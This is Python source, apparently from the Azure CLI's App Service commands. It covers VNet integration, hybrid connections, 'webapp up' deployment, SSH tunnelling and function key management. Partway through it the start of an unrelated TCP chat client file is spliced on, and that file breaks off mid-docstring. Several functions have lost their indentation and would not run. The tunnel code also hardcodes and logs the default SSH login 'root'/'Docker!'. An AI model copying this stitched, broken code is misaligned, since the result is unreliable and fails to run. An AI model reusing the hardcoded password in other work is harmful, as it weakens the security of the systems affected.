        logger.warning("Key type is invalid - must be primary or secondary")
        return
    apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace,
                                                                           hybrid_connection)
    # changes the key for every app that uses that hybrid connection
    for x in apps:
        app_info = ast.literal_eval(x)
        app_name = app_info["name"]
        app_id = app_info["id"]
        id_split = app_id.split("/")
        app_resource_group = id_split[4]
        hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
                              relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
                              send_key_value=key)
        web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
                                                     hybrid_connection, hc)
    return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
                                                                           namespace, hybrid_connection)
def appservice_list_vnet(cmd, resource_group_name, plan):
    """List the virtual-network connections of an App Service plan."""
    return web_client_factory(cmd.cli_ctx).app_service_plans.list_vnets(resource_group_name, plan)
def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
    """Remove a hybrid connection from a (Windows) web app or slot.

    Warns and returns None for Linux apps, which do not support hybrid
    connections.
    """
    webapp = show_webapp(cmd, resource_group_name, name, slot)
    if webapp.reserved:  # 'reserved' flags a Linux plan
        return logger.warning("hybrid connections not supported on a linux app.")
    client = web_client_factory(cmd.cli_ctx)
    if slot is None:
        return client.web_apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection)
    return client.web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace,
                                                         hybrid_connection, slot)
def list_vnet_integration(cmd, name, resource_group_name, slot=None):
    """List a web app's VNet integrations, reformatted to drop GUID name
    prefixes and internal fields."""
    client = web_client_factory(cmd.cli_ctx)
    if slot is None:
        connections = client.web_apps.list_vnet_connections(resource_group_name, name)
    else:
        connections = client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot)
    pruned = []
    for conn in connections:
        # The service prefixes names with "<GUID>_"; strip up to the first underscore.
        long_name = conn.name
        short_name = long_name.split('_', 1)[1] if '_' in long_name else long_name
        # Rebuild the resource id with the shortened trailing segment.
        vnet_id = conn.id
        short_id = vnet_id[:vnet_id.rindex('/')] + '/' + short_name
        pruned.append({"certThumbprint": conn.cert_thumbprint,
                       "id": short_id,
                       "location": conn.additional_properties["location"],
                       "name": short_name,
                       # resource group is the 5th segment of the ARM resource id
                       "resourceGroup": vnet_id.split('/')[4],
                       "routes": conn.routes,
                       "type": conn.type,
                       "vnetResourceId": conn.vnet_resource_id})
    return pruned
def add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None):
    """Connect a web app (or slot) to a subnet via regional VNet integration.

    Accepts *vnet* as either a name or a full resource ID.  Delegates the
    subnet to Microsoft.Web/serverFarms when it is not already delegated,
    then creates the Swift virtual-network connection and returns a pruned
    summary dict.  Warns and returns None when the VNet is not found or the
    plan cannot scale to Premium v2.
    """
    SwiftVirtualNetwork = cmd.get_models('SwiftVirtualNetwork')
    Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
    client = web_client_factory(cmd.cli_ctx)
    vnet_client = network_client_factory(cmd.cli_ctx)
    # collect every subscription VNet matching the given name or id
    list_all_vnets = vnet_client.virtual_networks.list_all()
    vnets = []
    for v in list_all_vnets:
        if vnet in (v.name, v.id):
            vnet_details = parse_resource_id(v.id)
            vnet_resource_group = vnet_details['resource_group']
            vnets.append((v.id, v.name, vnet_resource_group))
    if not vnets:
        return logger.warning("The virtual network %s was not found in the subscription.", vnet)
    # If more than one vnet, try to use one from same resource group. Otherwise, use first and log the vnet resource id
    found_vnet = [v for v in vnets if v[2].lower() == resource_group_name.lower()]
    if not found_vnet:
        found_vnet = [vnets[0]]
    (vnet_id, vnet, vnet_resource_group) = found_vnet[0]
    if len(vnets) > 1:
        logger.warning("Multiple virtual networks of name %s were found. Using virtual network with resource ID: %s. "
                       "To use a different virtual network, specify the virtual network resource ID using --vnet.",
                       vnet, vnet_id)
    if slot is None:
        swift_connection_info = client.web_apps.get_swift_virtual_network_connection(resource_group_name, name)
    else:
        swift_connection_info = client.web_apps.get_swift_virtual_network_connection_slot(resource_group_name,
                                                                                          name, slot)
    # check to see if the connection would be supported
    if swift_connection_info.swift_supported is not True:
        return logger.warning("""Your app must be in an Azure App Service deployment that is
              capable of scaling up to Premium v2\nLearn more:
              https://go.microsoft.com/fwlink/?linkid=2060115&clcid=0x409""")
    subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
    delegations = subnetObj.delegations
    delegated = False
    for d in delegations:
        if d.service_name.lower() == "microsoft.web/serverfarms".lower():
            delegated = True
    if not delegated:
        # delegate the subnet to App Service before connecting
        subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
        vnet_client.subnets.begin_create_or_update(vnet_resource_group, vnet, subnet,
                                                   subnet_parameters=subnetObj)
    # re-read the subnet to obtain its canonical resource id
    id_subnet = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
    subnet_resource_id = id_subnet.id
    swiftVnet = SwiftVirtualNetwork(subnet_resource_id=subnet_resource_id,
                                    swift_supported=True)
    if slot is None:
        return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection(resource_group_name, name,
                                                                                        swiftVnet)
    else:
        return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection_slot(resource_group_name, name,
                                                                                             swiftVnet, slot)
    # reformats the vnet entry, removing unecessary information
    id_strings = return_vnet.id.split('/')
    resourceGroup = id_strings[4]
    mod_vnet = {
        "id": return_vnet.id,
        "location": return_vnet.additional_properties["location"],
        "name": return_vnet.name,
        "resourceGroup": resourceGroup,
        "subnetResourceId": return_vnet.subnet_resource_id
    }
    return mod_vnet
def remove_vnet_integration(cmd, name, resource_group_name, slot=None):
    """Delete the Swift virtual-network connection of a web app (or slot)."""
    client = web_client_factory(cmd.cli_ctx)
    if slot is None:
        return client.web_apps.delete_swift_virtual_network(resource_group_name, name)
    return client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot)
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Return the run history of a triggered WebJob."""
    web_apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot:
        return web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
    return web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
def webapp_up(cmd, name, resource_group_name=None, plan=None, location=None, sku=None,  # pylint: disable=too-many-statements,too-many-branches
              os_type=None, runtime=None, dryrun=False, logs=False, launch_browser=False, html=False):
    """Create or reuse the resource group, plan and web app needed to host
    the code in the current directory, then zip-deploy that code.

    Infers OS and runtime from the source tree unless given explicitly.  On
    success, persists the chosen defaults (group, sku, appserviceplan,
    location, web) into the CLI config for later commands.

    :param name: web app name; decides whether a new app is created or an
        existing one is redeployed (name/RG/plan/OS must then match).
    :param dryrun: when True, only return the configuration that would be used.
    :param logs: when True, configure default logging and stream logs after deploy.
    :param html: deploy as a static HTML app (conflicts with --runtime).
    :return: dict describing the app (name, plan, sku, os, location, URL, ...).
    """
    import os
    AppServicePlan = cmd.get_models('AppServicePlan')
    src_dir = os.getcwd()
    # escape path separators so the value survives the raw JSON template below
    _src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep))
    client = web_client_factory(cmd.cli_ctx)
    user = get_profile_username()
    _create_new_rg = False
    _site_availability = get_site_availability(cmd, name)
    _create_new_app = _site_availability.name_available
    os_name = os_type if os_type else detect_os_form_src(src_dir, html)
    _is_linux = os_name.lower() == 'linux'
    if runtime and html:
        raise CLIError('Conflicting parameters: cannot have both --runtime and --html specified.')
    if runtime:
        # validate the user-supplied runtime against the known stacks
        helper = _StackRuntimeHelper(cmd, client, linux=_is_linux)
        runtime = helper.remove_delimiters(runtime)
        match = helper.resolve(runtime)
        if not match:
            if _is_linux:
                raise CLIError("Linux runtime '{}' is not supported."
                               " Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
            raise CLIError("Windows runtime '{}' is not supported."
                           " Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
        language = runtime.split('|')[0]
        version_used_create = '|'.join(runtime.split('|')[1:])
        detected_version = '-'
    else:
        # detect the version
        _lang_details = get_lang_from_content(src_dir, html)
        language = _lang_details.get('language')
        _data = get_runtime_version_details(_lang_details.get('file_loc'), language)
        version_used_create = _data.get('to_create')
        detected_version = _data.get('detected')
    runtime_version = "{}|{}".format(language, version_used_create) if \
        version_used_create != "-" else version_used_create
    site_config = None
    if not _create_new_app:  # App exists, or App name unavailable
        if _site_availability.reason == 'Invalid':
            raise CLIError(_site_availability.message)
        # Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those
        logger.warning("Webapp '%s' already exists. The command will deploy contents to the existing app.", name)
        app_details = get_app_details(cmd, name)
        if app_details is None:
            raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that the app "
                           "is a part of the current subscription".format(name))
        current_rg = app_details.resource_group
        if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
            raise CLIError("The webapp '{}' exists in ResourceGroup '{}' and does not "
                           "match the value entered '{}'. Please re-run command with the "
                           "correct parameters.". format(name, current_rg, resource_group_name))
        rg_name = resource_group_name or current_rg
        if location is None:
            loc = app_details.location.replace(" ", "").lower()
        else:
            loc = location.replace(" ", "").lower()
        plan_details = parse_resource_id(app_details.server_farm_id)
        current_plan = plan_details['name']
        if plan is not None and current_plan.lower() != plan.lower():
            raise CLIError("The plan name entered '{}' does not match the plan name that the webapp is hosted in '{}'."
                           "Please check if you have configured defaults for plan name and re-run command."
                           .format(plan, current_plan))
        plan = plan or plan_details['name']
        plan_info = client.app_service_plans.get(rg_name, plan)
        sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free'
        current_os = 'Linux' if plan_info.reserved else 'Windows'
        # Raise error if current OS of the app is different from the current one
        if current_os.lower() != os_name.lower():
            raise CLIError("The webapp '{}' is a {} app. The code detected at '{}' will default to "
                           "'{}'. Please create a new app "
                           "to continue this operation.".format(name, current_os, src_dir, os_name))
        _is_linux = plan_info.reserved
        # for an existing app check if the runtime version needs to be updated
        # Get site config to check the runtime version
        site_config = client.web_apps.get_configuration(rg_name, name)
    else:  # need to create new app, check if we need to use default RG or use user entered values
        logger.warning("The webapp '%s' doesn't exist", name)
        sku = get_sku_to_use(src_dir, html, sku, runtime)
        loc = set_location(cmd, sku, location)
        rg_name = get_rg_to_use(cmd, user, loc, os_name, resource_group_name)
        _create_new_rg = should_create_new_rg(cmd, rg_name, _is_linux)
        plan = get_plan_to_use(cmd=cmd,
                               user=user,
                               os_name=os_name,
                               loc=loc,
                               sku=sku,
                               create_rg=_create_new_rg,
                               resource_group_name=rg_name,
                               plan=plan)
    # summary of what will be (or would be, under --dryrun) created
    dry_run_str = r""" {
                "name" : "%s",
                "appserviceplan" : "%s",
                "resourcegroup" : "%s",
                "sku": "%s",
                "os": "%s",
                "location" : "%s",
                "src_path" : "%s",
                "runtime_version_detected": "%s",
                "runtime_version": "%s"
                }
                """ % (name, plan, rg_name, get_sku_name(sku), os_name, loc, _src_path_escaped, detected_version,
                       runtime_version)
    create_json = json.loads(dry_run_str)
    if dryrun:
        logger.warning("Web app will be created with the below configuration,re-run command "
                       "without the --dryrun flag to create & deploy a new app")
        return create_json
    if _create_new_rg:
        logger.warning("Creating Resource group '%s' ...", rg_name)
        create_resource_group(cmd, rg_name, loc)
        logger.warning("Resource group creation complete")
    # create ASP
    logger.warning("Creating AppServicePlan '%s' ...", plan)
    # we will always call the ASP create or update API so that in case of re-deployment, if the SKU or plan setting are
    # updated we update those
    create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku,
                            number_of_workers=1 if _is_linux else None, location=loc)
    if _create_new_app:
        logger.warning("Creating webapp '%s' ...", name)
        create_webapp(cmd, rg_name, name, plan, runtime_version if not html else None,
                      using_webapp_up=True, language=language)
        _configure_default_logging(cmd, rg_name, name)
    else:  # for existing app if we might need to update the stack runtime settings
        helper = _StackRuntimeHelper(cmd, client, linux=_is_linux)
        match = helper.resolve(runtime_version)
        if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version:
            if match and site_config.linux_fx_version != match['configs']['linux_fx_version']:
                logger.warning('Updating runtime version from %s to %s',
                               site_config.linux_fx_version, match['configs']['linux_fx_version'])
                update_site_configs(cmd, rg_name, name, linux_fx_version=match['configs']['linux_fx_version'])
                logger.warning('Waiting for runtime version to propagate ...')
                time.sleep(30)  # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
            elif not match:
                logger.warning('Updating runtime version from %s to %s',
                               site_config.linux_fx_version, runtime_version)
                update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version)
                logger.warning('Waiting for runtime version to propagate ...')
                time.sleep(30)  # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
        elif os_name.lower() == 'windows':
            # may need to update stack runtime settings. For node its site_config.app_settings, otherwise site_config
            if match:
                _update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version)
        create_json['runtime_version'] = runtime_version
    # Zip contents & Deploy
    logger.warning("Creating zip with contents of dir %s ...", src_dir)
    # zip contents & deploy
    zip_file_path = zip_contents_from_dir(src_dir, language)
    enable_zip_deploy(cmd, rg_name, name, zip_file_path)
    if launch_browser:
        logger.warning("Launching app using default browser")
        view_in_browser(cmd, rg_name, name, None, logs)
    else:
        _url = _get_url(cmd, rg_name, name)
        logger.warning("You can launch the app at %s", _url)
        create_json.update({'URL': _url})
    if logs:
        _configure_default_logging(cmd, rg_name, name)
        return get_streaming_log(cmd, rg_name, name)
    # remember choices as CLI defaults for subsequent commands
    with ConfiguredDefaultSetter(cmd.cli_ctx.config, True):
        cmd.cli_ctx.config.set_value('defaults', 'group', rg_name)
        cmd.cli_ctx.config.set_value('defaults', 'sku', sku)
        cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan)
        cmd.cli_ctx.config.set_value('defaults', 'location', loc)
        cmd.cli_ctx.config.set_value('defaults', 'web', name)
    return create_json
def _update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version):
    """Bring an existing Windows web app's stack settings in line with the
    resolved runtime *match*.

    Node runtimes are configured through app settings; every other stack is
    written directly onto site_config.  The update calls (and the 30-second
    propagation wait) only happen when a tracked value actually differs.
    """
    update_needed = False
    if 'node' in runtime_version:
        # node version lives in app settings (e.g. WEBSITE_NODE_DEFAULT_VERSION)
        settings = []
        for k, v in match['configs'].items():
            for app_setting in site_config.app_settings:
                if app_setting.name == k and app_setting.value != v:
                    update_needed = True
                    # BUGFIX: was settings.append('%s=%s', k, v) — list.append
                    # takes one argument, so this raised TypeError whenever a
                    # node setting needed updating.
                    settings.append('%s=%s' % (k, v))
        if update_needed:
            logger.warning('Updating runtime version to %s', runtime_version)
            update_app_settings(cmd, rg_name, name, settings=settings, slot=None, slot_settings=None)
    else:
        for k, v in match['configs'].items():
            if getattr(site_config, k, None) != v:
                update_needed = True
                setattr(site_config, k, v)
        if update_needed:
            logger.warning('Updating runtime version to %s', runtime_version)
            update_site_configs(cmd,
                                rg_name,
                                name,
                                net_framework_version=site_config.net_framework_version,
                                php_version=site_config.php_version,
                                python_version=site_config.python_version,
                                java_version=site_config.java_version,
                                java_container=site_config.java_container,
                                java_container_version=site_config.java_container_version)
    # keep the portal's CURRENT_STACK metadata in sync regardless of changes
    current_stack = get_current_stack_from_runtime(runtime_version)
    _update_webapp_current_stack_property_if_needed(cmd, rg_name, name, current_stack)
    if update_needed:
        logger.warning('Waiting for runtime version to propagate ...')
        time.sleep(30)  # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
def _update_webapp_current_stack_property_if_needed(cmd, resource_group, name, current_stack):
if not current_stack:
return
# portal uses this current_stack value to display correct runtime for windows webapps
client = web_client_factory(cmd.cli_ctx)
app_metadata = client.web_apps.list_metadata(resource_group, name)
if 'CURRENT_STACK' not in app_metadata.properties or app_metadata.properties["CURRENT_STACK"] != current_stack:
app_metadata.properties["CURRENT_STACK"] = current_stack
client.web_apps.update_metadata(resource_group, name, kind="app", properties=app_metadata.properties)
def _ping_scm_site(cmd, resource_group, name, instance=None):
    """Wake up the Kudu (SCM) site by issuing an authenticated GET.

    When *instance* is given, an ARRAffinity cookie pins the request to that
    specific scaled-out instance.
    """
    import requests
    import urllib3
    from azure.cli.core.util import should_disable_connection_verify
    # work around until the timeout limits issue for linux is investigated & fixed
    user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
    scm_url = _get_scm_url(cmd, resource_group, name)
    headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
    cookies = {} if instance is None else {'ARRAffinity': instance}
    requests.get(scm_url + '/api/settings', headers=headers, verify=not should_disable_connection_verify(),
                 cookies=cookies)
def is_webapp_up(tunnel_server):
    """Return whether the tunnel's target webapp is currently reachable."""
    return tunnel_server.is_webapp_up()
def get_tunnel(cmd, resource_group_name, name, port=None, slot=None, instance=None):
    """Build (but do not start) a TunnelServer for a Linux webapp.

    Validates that the plan is Linux and that *instance*, when given, names
    a known worker instance; raises CLIError otherwise.
    """
    webapp = show_webapp(cmd, resource_group_name, name, slot)
    if not webapp.reserved:  # 'reserved' is the ARM flag marking Linux plans
        raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")

    profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
    profile_user_name = next(p['userName'] for p in profiles)
    profile_user_password = next(p['userPWD'] for p in profiles)

    if port is None:
        port = 0  # Will auto-select a free port from 1024-65535
        logger.info('No port defined, creating on random free port')

    # Validate that we have a known instance (case-sensitive)
    if instance is not None:
        instance_names = {i.name for i in list_instances(cmd, resource_group_name, name, slot=slot)}
        if instance not in instance_names:
            if slot is not None:
                raise CLIError("The provided instance '{}' is not valid for this webapp and slot.".format(instance))
            raise CLIError("The provided instance '{}' is not valid for this webapp.".format(instance))

    scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
    tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password, instance)
    _ping_scm_site(cmd, resource_group_name, name, instance=instance)
    _wait_for_webapp(tunnel_server)
    return tunnel_server
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
    """Open a TCP tunnel to the webapp and keep it alive until timeout/exit."""
    tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
    worker = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
    worker.daemon = True
    worker.start()
    logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
    config = get_site_configs(cmd, resource_group_name, name, slot)
    if config.remote_debugging_enabled:
        logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
    else:
        # Default SSH credentials of the App Service SSH-enabled images.
        logger.warning('SSH is available { username: %s, password: %s }', 'root', 'Docker!')
    logger.warning('Ctrl + C to close')
    if timeout:
        time.sleep(int(timeout))
    else:
        while worker.is_alive():
            time.sleep(5)
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
    """Open a tunnel and attach an interactive SSH session over it."""
    tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
    tunnel_thread = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
    tunnel_thread.daemon = True
    tunnel_thread.start()
    # Default SSH credentials of the App Service SSH-enabled images.
    session_thread = threading.Thread(
        target=_start_ssh_session,
        args=('localhost', tunnel_server.get_port(), 'root', 'Docker!'))
    session_thread.daemon = True
    session_thread.start()
    if timeout:
        time.sleep(int(timeout))
    else:
        while session_thread.is_alive() and tunnel_thread.is_alive():
            time.sleep(5)
def _wait_for_webapp(tunnel_server):
    """Poll once per second until the webapp answers; give up after 60 tries.

    Raises CLIError on timeout.
    """
    attempts = 0
    while not is_webapp_up(tunnel_server):
        if attempts == 0:
            logger.warning('Connection is not ready yet, please wait')
        if attempts == 60:
            raise CLIError('SSH timeout, your app must be running before'
                           ' it can accept SSH connections. '
                           'Use `az webapp log tail` to review the app startup logs.')
        attempts += 1
        logger.warning('.')
        time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
    # Thread target: establish a Fabric SSH connection to the tunnelled
    # local port and hand the user an interactive login shell.
    tries = 0
    while True:
        try:
            c = Connection(host=hostname,
                           port=port,
                           user=username,
                           # connect_timeout=60*10,
                           connect_kwargs={"password": password})
            break
        except Exception as ex:  # pylint: disable=broad-except
            logger.info(ex)
            if tries == 0:
                logger.warning('Connection is not ready yet, please wait')
            if tries == 60:
                # Give up after ~60 one-second retries.
                raise CLIError("Timeout Error, Unable to establish a connection")
            tries = tries + 1
            logger.warning('.')
            time.sleep(1)
    try:
        # Show the message of the day, then replace the remote shell with a
        # login shell so profile scripts run for the interactive session.
        c.run('cat /etc/motd', pty=True)
        c.run('source /etc/profile; exec $SHELL -l', pty=True)
    except Exception as ex:  # pylint: disable=broad-except
        logger.info(ex)
    finally:
        c.close()
def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):  # pylint: disable=too-many-statements
    """Start an interactive SSH session into a Linux webapp container."""
    import platform
    if platform.system() == "Windows":
        raise CLIError('webapp ssh is only supported on linux and mac')
    config = get_site_configs(cmd, resource_group_name, name, slot)
    if config.remote_debugging_enabled:
        raise CLIError('remote debugging is enabled, please disable')
    create_tunnel_and_session(
        cmd, resource_group_name, name,
        port=port, slot=slot, timeout=timeout, instance=instance)
def create_devops_pipeline(
        cmd,
        functionapp_name=None,
        organization_name=None,
        project_name=None,
        repository_name=None,
        overwrite_yaml=None,
        allow_force_push=None,
        github_pat=None,
        github_repository=None
):
    """Interactively build an Azure DevOps CI/CD pipeline for a function app."""
    from .azure_devops_build_interactive import AzureDevopsBuildInteractive
    interactive = AzureDevopsBuildInteractive(
        cmd, logger, functionapp_name, organization_name, project_name,
        repository_name, overwrite_yaml, allow_force_push, github_pat,
        github_repository)
    return interactive.interactive_azure_devops_build()
def _configure_default_logging(cmd, rg_name, name):
    """Enable filesystem application/web-server/container logging for the app."""
    logger.warning("Configuring default logging for the app, if not already enabled")
    return config_diagnostics(
        cmd, rg_name, name,
        application_logging=True,
        web_server_logging='filesystem',
        docker_container_logging='true')
def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name):
    """Return a full ARM resource id for *ase*, expanding a bare ASE name."""
    if is_valid_resource_id(ase):
        return ase
    from msrestazure.tools import resource_id
    from azure.cli.core.commands.client_factory import get_subscription_id
    return resource_id(subscription=get_subscription_id(cli_ctx),
                       resource_group=resource_group_name,
                       namespace='Microsoft.Web',
                       type='hostingEnvironments',
                       name=ase)
def _validate_asp_sku(app_service_environment, sku):
# Isolated SKU is supported only for ASE
if sku in ['I1', 'I2', 'I3']:
if not app_service_environment:
raise CLIError("The pricing tier 'Isolated' is not allowed for this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
else:
if app_service_environment:
raise CLIError("Only pricing tier 'Isolated' is allowed in this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
def _format_key_vault_id(cli_ctx, key_vault, resource_group_name):
    """Return a full ARM resource id for *key_vault*, expanding a bare name."""
    if is_valid_resource_id(key_vault):
        return key_vault
    from msrestazure.tools import resource_id
    from azure.cli.core.commands.client_factory import get_subscription_id
    return resource_id(subscription=get_subscription_id(cli_ctx),
                       resource_group=resource_group_name,
                       namespace='Microsoft.KeyVault',
                       type='vaults',
                       name=key_vault)
def _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot=None):
    """Return True if *hostname* has a Verified or Managed binding on the app."""
    bindings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                       'list_host_name_bindings', slot)
    found = False
    for binding in bindings:
        leaf = binding.name.split('/')[-1]
        if leaf.lower() == hostname and binding.host_name_type in ('Verified', 'Managed'):
            found = True
    return found
def update_host_key(cmd, resource_group_name, name, key_type, key_name, key_value=None, slot=None):
    # Create or update a host-level key on a function app (or one of its
    # slots).  NOTE(review): key_value=None is forwarded as-is; presumably
    # the service then generates a value — confirm against the REST API.
    # pylint: disable=protected-access
    # Re-map KeyInfo so the name/value pair serializes under 'properties',
    # matching the ARM payload shape for host secrets.
    KeyInfo._attribute_map = {
        'name': {'key': 'properties.name', 'type': 'str'},
        'value': {'key': 'properties.value', 'type': 'str'},
    }
    client = web_client_factory(cmd.cli_ctx)
    if slot:
        return client.web_apps.create_or_update_host_secret_slot(resource_group_name,
                                                                 name,
                                                                 key_type,
                                                                 key_name,
                                                                 slot,
                                                                 name1=key_name,
                                                                 value=key_value)
    return client.web_apps.create_or_update_host_secret(resource_group_name,
                                                        name,
                                                        key_type,
                                                        key_name,
                                                        name1=key_name,
                                                        value=key_value)
def list_host_keys(cmd, resource_group_name, name, slot=None):
    """List the host keys of a function app (or one of its slots)."""
    apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot:
        return apps.list_host_keys_slot(resource_group_name, name, slot)
    return apps.list_host_keys(resource_group_name, name)
def delete_host_key(cmd, resource_group_name, name, key_type, key_name, slot=None):
    """Delete a host-level key from a function app (or one of its slots).

    Returns a human-readable message for the common outcomes (deleted /
    not found) and the raw response otherwise.
    """
    client = web_client_factory(cmd.cli_ctx)
    if slot:
        result = client.web_apps.delete_host_secret_slot(resource_group_name, name, key_type, key_name, slot,
                                                         raw=True)
    else:
        # BUGFIX: this call previously ran unconditionally, clobbering the
        # slot result above and deleting the key from the production app
        # even when a slot was specified.
        result = client.web_apps.delete_host_secret(resource_group_name, name, key_type, key_name, raw=True)
    if result.response.status_code == HTTPStatus.NO_CONTENT:
        return "Successfully deleted key '{}' of type '{}' from function app '{}'".format(key_name, key_type, name)
    if result.response.status_code == HTTPStatus.NOT_FOUND:
        return "Key '{}' of type '{}' does not exist in function app '{}'".format(key_name, key_type, name)
    return result
def show_function(cmd, resource_group_name, name, function_name):
    """Show details of a single function, or a message when it is absent."""
    client = web_client_factory(cmd.cli_ctx)
    result = client.web_apps.get_function(resource_group_name, name, function_name)
    if result is None:
        return "Function '{}' does not exist in app '{}'".format(function_name, name)
    return result
def delete_function(cmd, resource_group_name, name, function_name):
    """Delete a function from a function app, reporting the outcome."""
    client = web_client_factory(cmd.cli_ctx)
    result = client.web_apps.delete_function(resource_group_name, name, function_name, raw=True)
    status = result.response.status_code
    if status == HTTPStatus.NO_CONTENT:
        return "Successfully deleted function '{}' from app '{}'".format(function_name, name)
    if status == HTTPStatus.NOT_FOUND:
        return "Function '{}' does not exist in app '{}'".format(function_name, name)
    return result
def update_function_key(cmd, resource_group_name, name, function_name, key_name, key_value=None, slot=None):
    # Create or update a key scoped to a single function.  NOTE(review):
    # key_value=None is forwarded as-is; presumably the service then
    # generates a value — confirm against the REST API.
    # pylint: disable=protected-access
    # Re-map KeyInfo so the name/value pair serializes under 'properties',
    # matching the ARM payload shape for function secrets.
    KeyInfo._attribute_map = {
        'name': {'key': 'properties.name', 'type': 'str'},
        'value': {'key': 'properties.value', 'type': 'str'},
    }
    client = web_client_factory(cmd.cli_ctx)
    if slot:
        return client.web_apps.create_or_update_function_secret_slot(resource_group_name,
                                                                     name,
                                                                     function_name,
                                                                     key_name,
                                                                     slot,
                                                                     name1=key_name,
                                                                     value=key_value)
    return client.web_apps.create_or_update_function_secret(resource_group_name,
                                                            name,
                                                            function_name,
                                                            key_name,
                                                            name1=key_name,
                                                            value=key_value)
def list_function_keys(cmd, resource_group_name, name, function_name, slot=None):
    """List the keys of a single function (optionally for a slot)."""
    apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot:
        return apps.list_function_keys_slot(resource_group_name, name, function_name, slot)
    return apps.list_function_keys(resource_group_name, name, function_name)
def delete_function_key(cmd, resource_group_name, name, key_name, function_name=None, slot=None):
    """Delete a key from a single function (optionally for a slot).

    Returns a human-readable message for the common outcomes (deleted /
    not found) and the raw response otherwise.
    """
    client = web_client_factory(cmd.cli_ctx)
    if slot:
        result = client.web_apps.delete_function_secret_slot(resource_group_name,
                                                             name,
                                                             function_name,
                                                             key_name,
                                                             slot,
                                                             raw=True)
    else:
        # BUGFIX: this call previously ran unconditionally, clobbering the
        # slot result above and deleting the key from the production app
        # even when a slot was specified.
        result = client.web_apps.delete_function_secret(resource_group_name, name, function_name, key_name,
                                                        raw=True)
    if result.response.status_code == HTTPStatus.NO_CONTENT:
        return "Successfully deleted key '{}' from function '{}'".format(key_name, function_name)
    if result.response.status_code == HTTPStatus.NOT_FOUND:
        return "Key '{}' does not exist in function '{}'".format(key_name, function_name)
    return result
|
client.py | from socket import socket, AF_INET, SOCK_STREAM
from threading import Thread, Lock
import time
class Client:
    """Minimal TCP chat client.

    Connects to the server, announces *name*, and buffers incoming
    messages on a background receiver thread.
    """
    # GLOBAL CONSTANTS
    HOST = "localhost"
    PORT = 5500
    BUFSIZE = 512
    ADDR = (HOST, PORT)

    def __init__(self, name):
        """Connect, start the receiver thread and send *name* to the server.

        :param name: str -- display name announced to the server
        """
        self.messages = []
        # BUGFIX: the lock must exist before the receiver thread starts,
        # otherwise receive_message() can race on the missing attribute.
        self.lock = Lock()
        self.client_socket = socket(AF_INET, SOCK_STREAM)
        self.client_socket.connect(self.ADDR)
        client_thread = Thread(target=self.receive_message)
        client_thread.start()
        self.send_message(name)

    def receive_message(self):
        """Receive messages from the server until the socket fails/closes.

        :return: None
        """
        while True:
            try:
                msg = self.client_socket.recv(self.BUFSIZE).decode("utf8")
                with self.lock:  # guard the shared message buffer
                    self.messages.append(msg)
            except Exception as e:
                print("[HATA]", e)
                break

    def send_message(self, msg):
        """Send *msg* to the server; '{quit}' also closes the socket.

        :param msg: str
